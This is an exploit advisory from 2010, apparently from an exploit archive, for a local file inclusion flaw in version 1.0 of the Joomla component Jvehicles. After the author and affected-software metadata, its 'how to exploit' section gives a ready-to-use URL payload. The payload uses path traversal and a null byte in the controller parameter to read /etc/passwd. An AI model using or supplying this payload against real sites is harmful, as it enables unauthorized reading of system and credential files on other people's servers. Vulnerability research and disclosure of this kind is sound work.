[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Joomla Component Jvehicles Local File Inclusion
# Published : 2010-04-01
# Author : Chip D3 Bi0s
# Previous Title : Joomla Component EContent Local File Inclusion
# Next Title : Joomla Component User Status Local File Inclusion
---------------------------------------------------------------------------------
Joomla Component Jvehicles Local File Inclusion
---------------------------------------------------------------------------------
Author : Chip D3 Bi0s
Group : LatinHackTeam
Email & msn : chipdebios@gmail.com
Date : 31 March 2010
Critical Lvl : Moderate
Impact : Exposure of sensitive information
Where : From Remote
---------------------------------------------------------------------------
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : Jvehicles
version : 1.0
Developer : este8an
License : GPL type : Non-Commercial
Date Added : 5 May 2009
Download : http://www.jvehicles.com/index.php?option=com_remository&Itemid=6&func=select&id=2&orderby=3〈=en
Description :
Derivation of a popular component com_properties (for Estate Agent) .
This component is to manage vehicles. With the same functionality.
--------------
file error : components/com_jvehicles/jvehicles.php
how to exploit
http://127.0.0.1/index.php?option=com_jvehicles&controller=../../../../../../../../../../etc/passwd%00
------------------------
+++++++++++++++++++++++++++++++++++++++
[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++